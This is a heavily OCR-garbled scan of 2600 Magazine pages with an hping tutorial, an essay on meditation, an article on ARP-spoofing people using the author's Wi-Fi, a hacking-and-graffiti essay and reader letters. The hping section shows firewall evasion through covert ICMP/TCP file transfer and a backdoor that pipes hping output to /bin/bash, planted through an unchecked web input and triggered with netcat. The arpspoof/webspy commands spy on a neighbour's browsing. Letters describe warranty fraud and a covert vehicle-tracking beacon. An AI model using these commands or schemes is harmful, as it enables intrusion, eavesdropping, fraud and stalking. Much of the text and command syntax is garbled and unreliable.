Академический Документы
Профессиональный Документы
Культура Документы
2600 Ma
g
azine
a nd di sconnect.
in each of these di sti nct peri ods, we
fou nd there to be one remaining constant.
The hacker cul ture has remai ned true to
its bel i efs and l argel y u naffected by the
changi ng wor l d a round us. i f you l ook at
one of our articl es from our ear l y days and
compare it to someth i ng from thi s i ssue,
you' l l not i ce that, whi Ie the technol ogy
is compl etel y di fferent, the spi r i t behind
the wri ting has mor e or l ess rema i ned
t he same. it's al ways about aski ng ques
t i ons, performi ng a l l sorts of experi ments,
theori zi ng, and, above a l l el se, shari ng thp
resu l ts with the rest of us. Throughout al l
of the change and tu rmoi l , thi s much has
fema i ned.
Oncp we rpal ized that wp had these
three un i que decades and a common
thread' that ran between them, i t was j ust
a matter of picki ng the stori es that bpst
summed up what was goi ng on at the timp.
;s it tu rned out, this was another d,l unting
task. There were just so many fascinating
pieces that have gone into our pages ovl' r
the years that it became pa i nfu l to deci de
wh i ch ones wou l d be i ncl uded and whi ch
wou l d have to be l eft out. And even after
we had done a whol e l ot of cutting and
t rimmi ng, it was al l too cl ear that WP just
had an CJveralJllnc,mcp of m,lteri,ll . Trying
to fit it into a 360 page book wou I d be
next to imposs i bl e. in fact, just the 19BOs
cou l d have easi l y fil l ed the entire page
a 1I0cation i f we had l et it.
Fortunatel y, our publ ishers had the
good sense to l ubby for a dramatic
i ncrease in size for the book cnd we
found oursel ves wi t h a l i mi t that was over
600 pages instead. As the months went
on, t hi s wou nd up bei ng i ncreased once
more to near l y 900 pages ! Apparent l y,
the publ i shers had j ust as di ff i cu l t a t i me
f i gur i ng out what t o cut as we di d. What
better endorsement cou l d we poss i bl e ask
for?
arti cl e i n our very f i rst i ssue ended wi t h the
sentence: "Tu rn the page and become a
part of our u nique worl d.")
We want to tha nk the many readers who
have been suggest i ng somethi ng l ike t hi s for
yea rs. We do l isten to these suggest i ons ane
we're happy t hat t he opportuni ty presented
i tsel f where we cou l d act ua l l y bring these
ideas to fru i tion. We al so want to t ha nk
Wi l ey ruhl i shing ane the many ppopl e
over there who have worked with us on this
project since it began l ast year. We now
h.Jve something which | make good
dedi of our material I1 l ot mor e accessibl e,
not oniy to our existing readers hut to 1
vast nu mber of others who have never pven
he.ml of 26()(} ,1e whose onl y [wneption
of what hackl'rs are ahout comes from thp
mass medi 'l. This i s c\ tremendous opportu
nity to h.lp our voices hc,lrd in whol e
new .Hen' ,mel to open somp doors in what
others on Iy spe as wa l is.
And fo lTlany of us, this wil l ill' t111
.1Il1.1Zing trip dO
es
port:
_ 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , e ther type I Pv4
[ root @doormouse - ] # hping2
( Ox0 8 D D ) , l ength ] 4 , ( tos OxO , ttl 6 4 ,
-1 0c a1 hos t - S -p 2 2
- i d 8 2 5 1 , o f f set 0 , fags [ none ] ,
HPINC 1 CC! lC . | | 1 C 1 2 7 . 0 . 0 . 1 ) , S CCl , proto T o , i ) , l eng t h 2 0 ) 1 2 7 . 0 . 0 . 1
- 4 0 headers 0 data bytes 1 en= 4 4 - . 1 2 7 . 0 . 0 . 1 , [ I i p6 ]
_ i p= 1 2 7 . 0 . 0 . 1 t t 1 = 6 4 DF i d= O spor t = 2 2 O xO O O O , 4 5 0 0 0 0 1 4 2 0 3 b 0 0 0 0 4 0 2 9 5 c 8 4
- fags = SA seq= O win= 3 2 7 9 2 r t t = 0 . 2 ms - 7 f O O 0 0 0 1 E . . . . ; . . @ ) \ . . . . .
I n th i s exampl e, we' ve asked HPi ng to send
O x0 0 1 0 , 0 0 0 1
h I I h TCP/SYN k (
.
h h
1 3 , 3 3 , 0 9 . 0 2 5 6 3 1 0 0 , 0 0 , 0 0 : 0 0 , 0 0 , 0 0 .
t e oca ost pac ets - s) , Wi t t e
_ 0 0 , 0 0 , 0 0 ,
0 0 , 0 0 , 0 0 , ether type I Pv4
desti nati on TCP port set to 22, whi ch i s for ssh.
( Ox 0 8 0 0 ) , l ength 3 4 , ( tos OxO , ttl 6 4 ,
Th I k t t t h rt f
- i d 4 1 9 4 4 , o f f s et 0 , flags [ none ] ,
e rep y pac e s we ge are e next pa I
proto I Pv6 ( 4 1) , length 2 0 ) 1 2 7 . 0 . 0 . 1
the TCP three-way handshake, wi th the SYNI
_ . 1 2 7 . 0 . 0 . 1 , ' i p6 ]
ACK fl ags set. Thi s is i ndi cated i n HPi ng by the
4 5 0 0 0 0 1 4 a3 d8 0 0 0 0 4 0 2 9 d8 e6
flags = SA fi el d. Thi s tel l s us that t he TCP port i s
;
x
g ,
E
o o o i
. . . @) . . . . . .
open and that we are al l owed to access that 1 3 , 3 3 , 1 0 . 0 2 6 0 8 9 0 0 , 0 0 , 0 0 : 0 0 , 0 0 : 0 0 `
TCP port. Th i s is usefu l in test i ng whether or not
- 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , e ther type I Pv4
( Ox0 8 0 0 ) , l ength 3 4 , ( tos OxO , ttl 6 4 ,
your fi rewa l l ru l es are set up properl y. Let ' s say
_ i d 1 8 7 9 1 , o f f s e t 0 , flags [ none ] ,
that you have a web server and that you want
proto I Pv6 ( 4 1 ) , l ength 2 0 ) 1 2 7 . 0 . 0 . 1
to ensure that peopl e from the 10. 20 . 30 . 0124
;
x0
'
. 0 i
P
6 7 0 0 0 0 4 0 2 9 3 3 5 8
network are al l owed to access i t. You can j ust
= 0 0 0 1 E . . . lg . . @ ) 3 X . . . .
HPi ng the server wi th the SYN fl ag set and see i f
O x0 0 1 0 , 7 f 0 0 0 0 0 1
you get a repl y.
The l ast of the basi cs I ' m goi ng to tal k about i s
You can set al l , some, or none of t he TCP fl ags
the abi l i ty to speci fy your source address. Thi s i s
i f you wi sh to check TCP stacks or your I ntrusi on
excel l ent for testi ng anti -spoofi ng features of your
Protecti on System ( I PS) . For exampl e, i f you have
fi rewa l l or to perform "i dl e" scans. I leave that as
an I PS set up and you want to test your fi l ters
a project for you to fi gure out on your own.
agai nst odd TCP fl ag sett i ngs, you can use HPi ng
Now that you know how to craft basi c packets
to do that:
wi th HPi ng, you may start to wonder why you
[ root@doormouse _ ] # hping2
woul d use thi s for anythi ng except port scans or
- localhos t - FPU -p 9 9 9
secur i ty-rel ated measures. I magi ne that you work
Pa
g
e 20 2600 Ma
g
azine
for a managed servi ce provi der and that you
need to mon i tor both system heal th and servi ce
heal th. You can i ncorporate HPi ng i nto your
servi ce heal th mon itori ng by setti ng up a basi c
scri pt wh i ch wi l l craft packets, send them to the
servi ce i n questi on, del i ver a payl oad i f needed,
and then report back to your management stati on
whether or not the servi ce i s up, dependi ng on
the response received by HPi ng.
Advanced Features
One of HPi ng' s ni ce features is the abi l ity
to transfer fi l es across a "pi ng" sessi on. I ' ve
onl y done th i s wi th text fi l es, but I ' m sure that
someone out there knows how to successful l y
transfer a bi nary fi l e l i ke an i mage. Suppose you
have a text fi l e that you need to transfer, but a l l
the normal fi l e transfer opti ons l i ke FTP(S), SFTP/
SCP, and HTTP(S) are bl ocked by a fi rewal l ;
however, I CMP i s al l owed out. You can use HPi ng
to transfer the fi l e across I CMP. Fi rst you wi l l have
to set your target server to be in a l i sten state:
[ root@doormouse - 1 # hpi ng2 J ocal host
. - - l i s ten s i gnature - - s af e - - i cmp
Warning : Unabl e to guess
- the outpu t i nterf ace
hpi ng2 l i s t en mode
[ ma i n ] meml ockal l ( ) : Success
\::.: : ccr l di sable mcm.)y pagi ng !
Now that we have someone l i sten i ng, l et ' s
transfer the fi l e from our source mach i ne:
[ root @doorrOlse temp l # hp i ng2 l ocal hos t
- - i cmp
. - d 1 0 0 - - s i gn s i gnatur e
- -fl e . / randofi . s t u f f
Hl 1' l ocal hos t | 1 C 1 2 7 . 0 . 0 . 1 ) : i cmp
- mode s et , 2 8 headers 1 0 0 data bytes
[ ma i nl mem] ockal l { ) : Success
Warn ing : can ' t di sabl e memory paging !
l en o 1 2 8 i p" 1 2 7 . 0 . 0 . 1 t t l = 6 4 i d= 1 2 7 7 0 i cmp_
seq" O
. r t t = O . 3 ru s
l en" 1 2 8 i p" 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d" 1 2 7 7 3 i cmp_
seq= l
. r t t = O . l ,
l en" 1 2 8 i p" 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d" 1 2 7 7 5 i cmp_
seq=2
- rt t = O . 2 ,
l en " 1 2 8 i p" 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d" 1 2 7 7 7 i cmp_
seqd
. r t t " 0 . 2 ms
- - - l ocal hos t hping s t a t i s t i c - - -
4 packets trami t t ed, 4 packet s
recei ved , 0 % packet l os s
round- tri p mi n/ avg /rax 0 . 1 / 0 . 2 / 0 . 3 ms
The l i sten i ng si de wi l l then show:
hping2 l i s ten mode
[ ma i n] memlockal l ( ) : Success
Warni ng : can ' t di sable memory paging !
Li ne I
Line 2
Li ne J
Li ne 4
End o f Important F i l e
Looks l i ke we managed to transfer our i mpor
tant fi l e successful l y! Most peopl e won ' t si t and
exami ne I CMP l ogs, so you may be abl e to evade
any fi rewa l l or I PS in the way.
Let' s exami ne the same scenari o, except the
l ocati on you are at onl y al l ows CUPS outbound
and does deep packet i nspecti on, so you can' t
re-bi nd your FTP or SFTP server to that port. I
know thi s is far-fetched, but work wi th me on thi s
server on the remote end:
[ root@doormouse ] # net s t at -na
' grep LIST ' grep 6 3 1
tcp 0 0 1 2 7 . 0 . 0 . 1 : 6 3 1
0 . 0 . 0 . 0 : * L I STEN
[ root @doormouse - ] # hping2 l ocal hos t
- - - l i s ten s i gnature - - sa f e - p 6 3 1
Warning : Unabl e t o guess
the output i nt erf ace
hpi ng2 l i s ten mode
[ ma i n] meml ockal l ( ) : Success
Warning : can ' t di sabl e memory paging !
L i ne 1
Line 2
Line 3
Line 4
LiC of Important F i l e
The command to send the fi l e over TCP wi th
no fl ags l ooks l i ke th i s:
[ root@doormouse temp ] # hpi ng2 l ocal host -p
6 3 1
- - d 1 0 0 - - s ign s i gnat ure
- -- fl e . / random . s tu f f
Hl1' l ocal hos t | ! C 1 2 7 . 0 . 0 . 1 ) : NO PLAGS
are set ,
- 4 0 headers 1 0 0 data bytes
[ mai n] meml ocka l l ( ) : Success
Warn i ng : can ' t di sable memor y pagi ng !
l en " 4 0 ip" 1 2 7 . 0 . 0 . 1 t t l " 6 4 F i d o O
spor t = 6 3 1 " fags = RA seq= O wi n= O r t t = O . O rs
Keep i n mi nd that f i l es transferred th i s way are
not encrypted. Al though most peopl e won ' t be
i nspect i ng packets that much, anyone snoopi ng
on the wi re can grab your i nformati on.
You can al so use HPi ng as a back door. Get
the fol l owi ng command runni ng on a remote
host, possi bl y through an i nsecure websi te
wi th an unchecked i nput vari abl e: hping2
1 ethO - - l i s ten s i gnature - p cO
/ bin/bash. Then, use netcat to do some
th i ng l i ke th i s: echo ., s i gnaturereboot ; `
nc . 4 4 4 . O . O O O c O . Anyth i ng after
the word "si gnature" in the echo command
wi l l be processed by the / bin/bash to whi ch
HPi ng' s output i s bei ng pi ped, and so the server
reboots. Try th i s with your own machi nes:
use s i gnature touch remote . touched . fl e;
to see that the l i stener wi l l process what i s
bei ng asked of i t. You won ' t see anyth i ng on
the consol e, but when you stop HPi ng and do a
qu i ck I s , you shoul d now see a new fi l e cal l ed
remote . touched . fle i n the current di rectory.
Another use for th i s techni que i s as a "port
knocker." If you don ' t want to l eave your SSH
daemon up and runni ng a l l the ti me, set up
HPi ng on your SSH server. Whenever you want
to start your SSH daemon, use the command
s i gnatureservice s shd s tart ; .
Conclusion
As you can see, HPi ng is a great tool for both
basi c and more advanced appl i cati ons, and it
can be used i n a vari ety of di fferent ways. I t ' s
excel l ent for hel pi ng peopl e to l ear n how the
I P stack works, especi al l y the TCP fl ag setti ngs,
and i t' s great to use i n or al ong wi th custom
appl i cati ons. The topi cs I ' ve covered here i n thi s
arti cl e are j ust the begi nni ng, and I strongl y urge
you to become fami l i ar wi th thi s powerful tool .
one. You can transfer the fi l e to your server over
Shouts: magikhOe, Ihab, Exial, /ohnPNP and,
CUPS wi thout i nterferi ng wi th the runni ng CUPS
of course, eXoDuS. (YNBABWARLf)
Summer 2008
Pg
e 21
by Sai Emrys
2600@saizai . com
AI M, #ca2600: saizai
GPG: OxAFF1 F292
My experi ence has been that medi ta
ti on i s a subj ect that frequentl y pol ar i zes
peopl e: some bel i eve credul ousl y in al l
ki nds of unsupported nonsense, whi l e some
rej ect everythi ng whol esal e i n the name of
skept i ci sm.
However, medi tati on i s a useful way
to hack your mi nd state. Rather than j ust
taki ng some guru ' s preferred versi on of one
techni que as the One True Way, you j ust
have to get to know a vari ety of the tech
ni ques avai l abl e, tweak them to work for
your own worl d-vi ew and symbol set, and
understand what about them makes them
actual l y work.
I ' ve tal ked wi th a fai r number of peopl e
about t hi s, and one mi sconcept i on that
comes up ofen i s that "medi tati on" excl u
si vel y means "si tt i ng i n a dark, qui et room
in l otus posi ti on smel l i ng i ncense and
thi nki ng about nothi ng. " Thi s i s i ndeed one
method of medi tati on, known as mushin or
"empty mi nd. " I t i s far from the onl y one,
though, and i t ' s not necessari l y the best
fi rst approach for everyone, especi al l y not
for peopl e used to mul ti taski ng, l i ke most
hackers.
Another mi sconcept i on i s that medi ta
ti on is to be treated as somethi ng that you
do onl y i n speci al short peri ods of ti me. Thi s
i mpl i es that most of the t i me you are not i n
a medi tati ve mi nd state, but the whol e poi nt
of medi tati on is to change your everyday
l i fe.
There certai nl y i s a pl ace for separate,
focused medi tati on, but here is one cl ass
of methods I cal l "al l -poi nt" techni ques.
What makes thi s cl ass of methods work i s
the combi nat i on of a very ri ch envi ronment
and the strategy of not concentrat i ng overl y
on any part i cul ar pi ece of i t. These methods
Pg
e 22
are parti cu l ar l y wel l -su i ted to begi nni ng
one' s medi tati on experi ence and to easy,
everyday practi ce.
1. "Sof eyes"
Thi s is a rel ati vel y common techni que i n
mart i al arts.
I nstead of focusi ng on the eyes or hands
of the person you are tal ki ng wi th (or tryi ng
to di sarm) , ai m your eyes towards the neck
area and keep a soft focus, both mental l y
and l i teral l y.
A good way to check t hi s techni que is to
ask yoursel f a seri es of questi ons:
Where i s thei r ri ght hand and what
are they hol di ng?
What i s i n thei r pockets? ( Pnts, chest,
under-arm hol ster, buttocks . . . )
How tense are the muscl es around
and above thei r eyes? Shoul ders?
Neck?
How fast are they breath i ng?
How are they about to move?
Who and what i s nearby? Where i s
t he nearest exi t?
The way to tel l whether you ' re doi ng thi s
r i ght i s t o see i f you can answer al l of these
questi ons wi th onl y mi ni mal , i f any, move
ment of your eyes and attenti on; you shou l d
be abl e t o see al l of i t s i mul taneousl y.
Thi s is not an excl usi vel y mart i al tech
ni que, though i t ' s certai nl y useful for that;
try j ust doi ng it wi th everyone you see.
The poi nt is to be abl e to noti ce as much
as possi bl e, wi thout tel egraphi ng what you
are l ooki ng at and wi thout havi ng your
attenti on excl usi vel y focused on one t hi ng.
Magi ci ans and fi ghters both l i ke i t when
they can use mi sdi recti on to make you not
noti ce t hi ngs whi ch are wi thi n your si ght.
2. Really enjoyi ng nature
Go somewhere you ' l l fi nd beauti fu l . I ' l l
use h i l l s a s a n exampl e si nce that ' s what I
most enj oy, but anythi ng vi brant wi l l work.
Normal l y, when most peopl e go to
2600 Ma
g
azine
"enj oy nature," they ei ther barel y noti ce i t
at a l l because they' re di stracted by equ i p
ment, thei r l atest argument, pl anni ng the
next day' s work, etc. ; they noti ce one spot
l i ghted bi t at a ti me; or they not i ce onl y a
very vague ambi ance.
I nstead, try to i ndi vi dual l y see every
t hi ng i n deta i l .
An easy way to do th i s i s to start by
l i mi t i ng your attent i on to two t hi ngs; for
exampl e, feel i ng wi nd on your ski n and
seei ng t he cl ouds move. See as much detai l
as you can i n those two t hi ngs. Then add
a thi rd, such as the feel of sunl i ght or the
movement of a patch of grass nearby.
The key l i es i n addi ng more t hi ngs to
your attenti on s i mu l taneousl y wi thout
l osi ng detai l i n the previ ousl y percei ved
ones. Thi s can very qui ckl y become over
whel mi ng; the amount of i nformati on i n
any natural scene i s extremel y dense. Even
a smal l patch of grass wi l l have enough
movement and detai l i n i t to swamp your
mu l ti threadi ng.
Fortunatel y, thi s i s a l earnabl e ski l l .
Wi th practi ce, you ' l l fi nd that your efecti ve
t hreadcount and buffer si ze go up.
As a ni ce bonus, t he more you can real l y
noti ce, t he more enj oyabl e i t i s .
3. I ndividuals in crowds
What di d you noti ce the l ast t i me you
wal ked down the street?
I t ' s i nterest i ng that the amount you
rel ate to peopl e as i ndi vi dual s tends to be
i nversel y rel ated to the number of peopl e
present. Crowds gai n a separate character
of thei r own: i t ' s easi er to si mpl y i nterpret
them as a mass. Thi s is al so true in reverse;
bei ng a member of a crowd makes one l ess
apt to empathi ze wi th others as i ndi vi dual s.
Look up t he case of Ki tty Genovese for one
sad exampl e.
Next t i me you are out, try t o noti ce
faces, body posture, and the di stances
peopl e stand from each other, rather than
gl azi ng over. Don ' t attach too much to each
personal drama; j ust noti ce, recogni ze, and
keep movi ng.
The goal for thi s i s to i ncrease the scope
of t hi ngs whi ch you can take i n consci ousl y,
maki ng a "mere" wal k down the street a
somewhat more al i ve experi ence. For more
on recogni zi ng faci al emoti ons, I h i ghl y
recommend the work of Pul Ekman, and
for more on the si gni fi cance of proxi mi ty
i n human i nteracti on, I recommend The
Hidden Dimension and The Silent Lan
g
ua
g
e,
both by Edward T. Hal l .
Concl usion
There are many other si tuati ons i n whi ch
you can pract i ce th i s " al l -poi nt" tech ni que:
wh i l e pl ayi ng RTSs and other games wi th
l ots of t hi ngs happen i ng at once; wh i l e
l i sten i ng t o compl ex mu l t i - part musi c
such as Rachman i noff, Bach, or Godspeed
You ! Bl ack Emperor; whi l e noti c i ng a l l
the background sounds wherever you are,
i ncl udi ng computer fans, hard dri ve cl i cks,
traffi c, your own breath i ng, radi os, nei gh
bors, and so on; or wh i l e experi enci ng any
envi ronment.
The purpose of thi s cl ass of techni ques
is to l earn to be abl e to deal wi th h i ghl y
mul ti threaded, content-r i ch, real -ti me si tu
ati ons i n a serene manner, so you can not
onl y experi ence as much of these s i tuati ons
as possi bl e but al so do so wi thout bei ng
overwhel med. Thi s i s a l ot l i ke t he eventual
purpose of tradi ti onal empty-mi nd medi ta
ti on; i t ' s j ust a di fferent approach. I ' ve gi ven
j ust a few of doi ng thi s. I t' s up to you to
fi gure out one that ' l l be effecti ve for you i n
your dai l y l i fe. The more that you can i nte
grate th i s way of i nteracti ng wi th the wor l d
as a dai l y habi t, the mor e efecti ve i t ' l l be at
shi fi ng your basel i ne mi nd state.
I f you have any feedback on t hi s or are
i nterested i n seei ng more, pl ease contact
me. I ' m worki ng on a book tentati vel y enti
tl ed A Hacker 's Guide to Meditation: Prac
tical Recipes Without the Dogma, whi ch
ai ms t o be a compl ete gui de t o al l known
cl asses of efecti ve medi ati on techni ques
of whi ch thi s art i cl e di scusses j ust one
from a pragmati c, open-source perspec
ti ve. Thi s i ncl udes techni ques tradi ti onal l y
taught as medi tati on, psychotherapy, and
more. I f you fi nd th i s useful , or i f you have a
techni que or vari ant I mi ght not have heard
of, I ' d l i ke to know.
Happy mi nd-hacki ng!
Sai Emrys i s a recent graduate of
UC Berkeley in cognitive science, looking
to do doctoral work in the neuroscience
of empathy. Other interests include
running the Language Creation Conference
(conlangs . berkel ey . edu), interpreting
music in American Sign Language (YouTube
saizai), coding in Ruby on Rails, and
consulting on international business.
Summer 2008 Pg
e 2
3
DOc
wD D G
DODC
QD D wc
DDDDDC
[ DDQDO
by Uriah C.
I enj oy l eavi ng my wi rel ess access poi nt
ava i l abl e for others to connect to and use t he
I nternet. There i s one cat ch, however: I get t o
pl ay and moni tor t he traffi c whenever I want
t o. I n t hi s arti cl e, I wi l l descri be a past i me
t hat i s fu n and reveal i ng of your nei ghbors.
I recent l y fou n d a new host on my network
to pl ay wi t h. New fri ends are fun ! I frequent l y
use EtherApe to qu i ckl y moni tor my n etwork
traffi c, and I fou n d a new computer name
on my network. Knowi ng t hat t h i s person
was on my network, I fi red up n map to do
a qu i ck pi n g sweep to confi rm my new
fr i end. My new fr i end ' s computer name was
her rea l name, and I cou l d see t hat s he had
t he I P address of 192 . 168. 1.104. The fami l y
computer was on 192. 168. 1. 103, my l aptop
was on 192 . 168.1. 101, and the access poi nt
was on 192 . 168. 1. 1.
Si nce I had a new fri end to p l ay wi th, I
deci ded to vi ew t he traffi c that was goi n g
through. Of course I cou l d do that wi t h
EtherApe, but I wanted more t hen j u st I P
addresses a n d URLs. Besi des, I was i tch i ng
to use t he program webspy for a l i ttl e bi t .
Before I go i nto t he fun t oo much, l et
me expl a i n what webspy i s . Webspy i s a
program t hat i s part of Doug Song' s ds ni ff
s u i te. These tool s are desi gned to penetra
t i on test your n etwork, and, i n my case, h ave
fun wi th those on my n etwork. I mu st stress
that t h i s s houl d on l y be done on your own
network or on one that you h ave been gi ven
per mi s s i on to preform s uch tests . Now t hat
t he l egal stuff i s out of t he way, l et's get on
wi t h t he fun .
The fi rst thi ng I have to do i s to AR P poi son
the host and the gateway. Thi s way, the traffi c
wi l l be routed to my computer. Th i s i s done
by open i ng two termi nal wi ndows.
In the fi rst termi nal , type:
# arpspoo f - i eth1 -t
192 .1 68.1.1 192.168.1.1 0 4
I n t he s econd termi n a l , t ype:
# arpspoo f -i eth1 - t
1 9 2 . 1 6 8 . 1 . 1 0 4 1 9 2 . 1 6 8 . 1 . 1
Then , I n eed to make s ure t hat I am
forwardi n g traff i c to t he proper l ocat i on s,
s o I u se fra grouter. I n a t h i rd termi n a l ,
type:
# fragrouter -i e th1 - B1
Now l et ' s see wh at t h i s does . The
fi rst arpspoo f c omma n d s ends forged
arp i n format i o n over the i nterface ( - i)
eth1 to the target ( - t) 192 . 168. 1. 1
t hat my computer i s 192 . 168. 1. 104,
wh i l e the secon d termi n a l tel l s the target
192 . 168. 1. 104 t hat my computer i s
192 . 168. 1. 1. Mea n wh i l e, fra grouter s ends
t he broadcast a ddress ( - B1 ) a l l traff i c t hat
h a s come i n, s o t here i s n o i nterr upt i on of
servi ce.
N ow, i t ' s t i me for t he l a st few steps . I
n eed to r u n web s py a n d open a brows er.
Then , I c a n h ave t he f un of s ee i n g whatever
someon e e l se sees. So, I wou l d open u p
two more termi na l s . I n t he fourt h termi n a l ,
t ype:
# webspy -i e th1 1 9 2 . 1 6 8 . 1 . 1 0 4
And, fi n a l l y, i n t he f i ft h termi n a l , t ype:
# fre fox
N ow, F i refox opens u p, a n d I get to see
the websi tes that my new fr i end opens up
i n real ti me. I ' ve onl y seen one probl em:
i f an ad pops up on a separate page from
the rest of a webs i te, i t ' l l be shown sepa
ratel y from the rest of the or i gi nal si te. So,
i f my fr i end goes to MySpace, then I see
MySpace, but it qui ckl y fl ashes over to
show j ust the a d wi t hout the rest of the
si te. I h ave my browser set to open these
ads i n di fferent tabs, so I can see the page
and the ad.
You never know what ki nd
of si tes others may vi si t, s o you
shou l d do t hi s wi t h di screti on
especi al l y i f the ki ds are runni ng around
the house and the mater i al comi ng up i s
quest i onabl e.
Pg
e 24
2600 Ma
g
azine
. A 4
by scOut64
scOut64@yahoo.ca
I fi nd that one of my l ongest- run n i ng
fasci nati ons, computer hacki ng, has a l ot
to do wi t h my greatest passi on and hobby,
graffi ti art. These are two very controversi al
s ubj ects, and di scussi ng t hem can usua l l y
generate a great response, dependi ng on who
you ask. Thi s i s not a how-to arti cl e by any
means, but rather a way to shed some l i ght
on the s i mi l ari t i es between two of my favor i te
pasti mes. But I ' l l sti l l i ncl ude t he standard
di scl ai mer that gett i ng caught parti ci pat i ng
i n ei t her of these acti vi ti es mi ght get you i n
troubl e.
The fi rst t hi ng I can fi nd these two s ubj ects
have i n common i s the react i on that you get
when you tel l someone that you do one or the
other. I f you tel l someone you ' re a computer
hacker, you can usual l y expect confused or
wary l ooks. Peopl e assume that you ' ve done
shady t hi ngs before, and they approach
conversat i on choos i ng thei r words carefu l l y,
assumi ng that you mi ght take some of the
i nformati on and use i t agai nst t hem. They
mi ght not be aware that the hacki ng you do
mi ght be compl etel y l ega l . You mi ght be a
pen tester for a secur i ty fi rm, or you j ust mi ght
l i ke run n i ng wargames on your networ k wi t h
your fri ends. I t depends on your defi n i t i on of
a hacker.
S i mi l ar l y, when you tel l someone
t hat you ' re a graffi ti arti st, s ome peopl e
automati cal l y assume that you ' re a vandal .
They thi n k you ' re one o f those stereotypi cal
guys who tags up conveni ence stores at
ni ght, or t hat you ' re one of the peopl e who
vandal i zed a l l t hose New Yor k Ci ty trai ns
years ago. They mi ght thi n k that your bedroom
i s a mess and that a l l your school books are
scri bbl ed on. They may not rea l i ze that there
are pl enty of l egal areas to tag up and that
what you do fal l s compl etel y wi th i n the l aw,
or that you mi ght be a graphi c desi gn student
whose styl e i s compl etel y di gi ta l . I t depends
on your defi n i t i on of graffi t i .
Another s i mi l ari ty between these two
Yor k Ci ty. Yes, it caused a l l ki nds of chaos,
and many peopl e were penal i zed once the
ci ty i mpl emented graffi ti l aws. L i ke many
great thi ngs, because it was new and brought
change, peopl e di dn' t l i ke i t. Li kewi se,
when hacki ng started becomi ng extremel y
popu l ar, there were no l aws or governi ng
bodi es t o regul ate what went on. Wi th these
two cu l t ures and many others, once the
gover nment fel t t hi ngs got a l i ttl e too out of
control , they stepped i n and "supervi sed. "
There are a n umber of ot her s i mi l ar i t i es
between the t wo fi el ds:
8 i ssue,
ave
I have a few questi ons and requests for advi ce
somet hi ng to add that was not menti oned. Thi s mfo
from the phone phreaks, the net savvy, and the en-
comes from personal experi ence as a customer.
gi neers among us. Is there such thi ng as a
p
repai d
Whi l e Thomps had a secti on of hi s arti cl e ti tl ed
cel l phone servi ce that has GPS (or other tnangul a-
"Free Phones" he onl y tal ked about getti ng di scounts
ti on) features for real -ti me tracki ng? Woul d usi ng an
(whi ch I mi ght add was qui te i ngeni ous), not getti ng
anonymi zer websi te whi l e tracki ng i t over the net be
a phone for free. I t i s possi bl e to obtai n phones from
suffi ci ent to dust a trai l of the IP address of the "desk-
them for free.
top" porti on of the survei l l ance?
You don't even have to be el i gi bl e for an up
-
I
'
m al so seeki ng
advi ce on a project I envi si on
grade or buy addi ti onal accessori es to do thi s. Al l
compl eti ng: an economi cal way t o modi fy a com-
you need i s a phone that i s sti l l under warranty wi th
mon GMRS or FRS radi o to functi on wi th a control
AT&T. They gi ve you a one year warranty when you
uni t that woul d transmi t a si gnal wi th a 1 kHz tone
buy a phone from them. A l ot of peopl e don't even
at, for exampl e, ten second i nterval s whi l e a vehi cl e
real i ze they have thi s warranty. So let's say you own
i s stopped, and at three second i nterval s once move-
an HTC 8525 . You want the li l t, don't you . . . . I t has
ment of the vehi cl e i s detected. A combi nati on of
GPS, you know you want i t. What you do i s cal l i n
a pi ezoel ectri c swi tch on a mi croprocessor whi ch
and tel l them you have a probl em wi th your phone.
woul d control the radi o comes to my mi nd. I have
Make a probl em up; i t has to be somethi ng unre-
pl enty of experi ence at troubl eshooti ng, repai ri ng,
l ated to the battery and can't seem l i ke i t woul d be
and bui l di ng el ectroni cs contrapti ons but next to
consi dered abuse or other damage that woul d voi d
none engi neeri ng them as i s t he nature of thi s proj -
your warranty. For i nstance, tel l them the recepti on
ect. The pri ces of ones I 've shopped for commerci al l y
seems t o be degraded from when you fi rst purchased
have been somewhere between absurd and astro-
the phone, or maybe the phone freezes al l the ti me
nomi cal . And a huge percentage of that i nvestment
or buttons i ntermi ttentl y work. They wi l l gl adl y try to
goes i nto a ri ver or gets beat wi th a sl edgehammer i f
sol ve the probl em for you, but of course you wi l l tel l
the transmi tter gets di scovered. I ' m al so consi der i ng
t hem none of t he sol uti ons worked. They wi l l end
changi ng t he radi o's crystal so as t o avoi d t he si gnal
up shi ppi ng you another phone. After you get the
getti ng "wal ked over" by anyone transmi tti ng near-
phone, cal l them up agai n. Tel l them this one has the
by on the same frequency, i ntercepted by curi ous
same probl em, or another probl em of your choi ce.
scanni ng enthusi asts, etc. As of now, my RF scan-
You want them to send you another phone.
ner woul d be used as the receiver, but eventual l y I
You wi l l do t hi s a total of three ti mes, then on
pl an to progress to a recei ver wi th an anal og meter
your fi nal cal l you wi l l tel l them that you have had
movement and h i ghl y sensi tive gai n control . Perhaps
enough, repl aci ng these 8525s i sn't getti ng anywhere
the thi rd stage of thi s progressi on wi l l be to bui l d
- you want a di fferent phone. The next cl osest phone
my own tri angul ati on receiver. Anyway, even i n i ts
is the li l t, so that is what you can get out of them. I
most basi c form, thi s "bumper beacon" wi l l gi ve me
have done t hi s twi ce, worked perfectl y both ti mes.
the abi l i ty to more qui ckl y fi nd, then narrow down
The onl y drawback wi th thi s method i s that you can
the l ocati on of the parked target vehi cl e (provi ded of
onl y get a s i mi l ar phone to what you have currentl y.
course that it is wi thi n range of suspected l ocati ons) .
You coul d work your way up to the best phone over
I wi l l greatl y appreci ate feedback and advi ce on how
Pa
g
e 34 2600 Ma
g
azine
I can desi gn and accompl i sh thi s l i ttl e project.
J ust in case you're wonderi ng about my moti ves,
I ' m a professi onal "peopl e watcher" i . e. , a Pri vate I n
vesti gator, provi di ng needed servi ces for good peopl e
bei ng done wrong by others i n matters of ci vi l l aw.
The PI message boards and emai l groups woul d go
ape-dung if such questi ons as the ones above were
posted there. Pl us the desi gn questi ons woul d l i kel y
be too techn i cal for al l but a few of them.
Carl
The only prepaid service we're aware of with
full-blown GPS is Boost Mobile' iDEN product (they
market both iDEN and COMA products, and only
the iOEN product includes a precise GPS receiver).
You could, in theory write an application to log the
location periodically and post it to a website using
the data connectivity package.
Sprint also sells something called Sprint Family
Locator. See https:llsfl. sprintpcs. comlfinder-sprint
-familylsignln. htm for details. This will provide the
approximate location of your target. However, it is
not available as a prepaid service.
Dear 2600:
Are you guys sti l l accepti ng photos of payphones
